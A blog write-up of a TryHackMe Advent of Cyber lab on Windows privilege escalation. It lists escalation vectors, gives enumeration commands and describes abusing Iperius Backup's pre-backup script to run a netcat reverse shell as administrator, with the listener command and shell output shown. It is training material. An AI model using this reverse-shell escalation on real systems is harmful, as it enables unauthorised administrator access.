AoC3#13: They Lost The Plan!

Today’s CTF challenge in TryHackMe’s Advent of Cyber is all about privilege escalation on a Window’s box.

After a bit of story, we’re told of several privilege escalation avenues on a Window’s box, they include:

A few common vectors that could allow any user to increase their privilege levels on a Windows system are listed below:

  • Stored Credentials: Sometimes people store their top-secret credentials in easily accessible & readable places.
  • Windows Kernel Exploit: The Windows operating system may have a known vulnerability that can be exploited to increase privilege levels.
  • Insecure File/Folder Permissions: In some situations, even a low privileged user can have read or write privileges over files and folders that can contain sensitive information
  • DLL Hijacking: Applications use DLL files to support their execution. If the DLL is missing, or we replace it with our own, the malicious DLL will run with the main application’s privilege level.
  • Unquoted Service Path: If the executable path of a service contains a space and is not enclosed within quotes, a hacker could introduce their own malicious executables to run instead of the intended executable.
  • Always Install Elevated: Windows applications can be installed using Windows Installer (also known as MSI packages) “AlwaysInstallElevated” policy. This allows the installation process to run with administrator privileges without requiring the user to have these privileges.

The CTF challenge also gives us some basic enumeration commands. I use xfree-rdp to remote into the target machine:

$ xfreerdp /u:{user} /p:{pass} /v:10.10.201.177

Noticed this when the remote desktop session connected, made me chuckle:

User Information

net users command lists out all the users on the system:

System Information

systeminfo spits out a whole bunch of O/S info that may be useful down the line:

The challenge explains you can pipe that output through a string finder, such as:

systeminfo | findstr /B /C: "OS Name"/C: "OS Version" 

Windows Services

The wmic service list dumps out a whole ream of services, their installation paths, status etc. You’d need some findstr or pipe action here as the output is almost unreadable – but it’s probably a wealth of info.

I used a bunch of the information from these 3 commands to grab a bunch of CTF flags for this challenge.

Exploiting Iperius Backup Service

So this was a service I’d never heard of, but it’s installed on our target box and contains a nasty little privilege escalation vulnerability.

I opened up the backup tool and select a folder to backup (Documents), plus a destination (Desktop), then selected to run a script to run before the backup starts… our payload: (renamed to payload.bat)

Building the backup payload

The payload is a simple netcat back to our host machine, which is running a simple nc listener on port 1337.

I executed the payload manually and received the following connection on my host machine:

└─$ nc -nlvp 1337
listening on [any] 1337 ...
connect to [10.8.39.10] from (UNKNOWN) [10.10.201.177] 49770
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\McSkidy\Desktop>whoami
whoami
the-grinch-hack\mcskidy   

Excellent.

I then selected the saved backup job and executed it, getting this prompt:

Run as administrator – yes please!

Within 60 seconds my host nc listener got another connection:

└─$ nc -nlvp 1337
listening on [any] 1337 ...
connect to [10.8.39.10] from (UNKNOWN) [10.10.201.177] 49771
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\Iperius Backup>whoami
whoami
the-grinch-hack\{admin-user}

Confirming we definitely have escalated our privileges. Brilliant.

Now we can use the remote cmd shell to sweep up the remaining Window’s flags and finish off Day 13.

This was a fun room; it was enjoyable utilising the backup vulnerability to launch a reverse shell straight into the Window’s box. Is there nothing that netcat can’t do 😉

Leave a Reply

Your email address will not be published.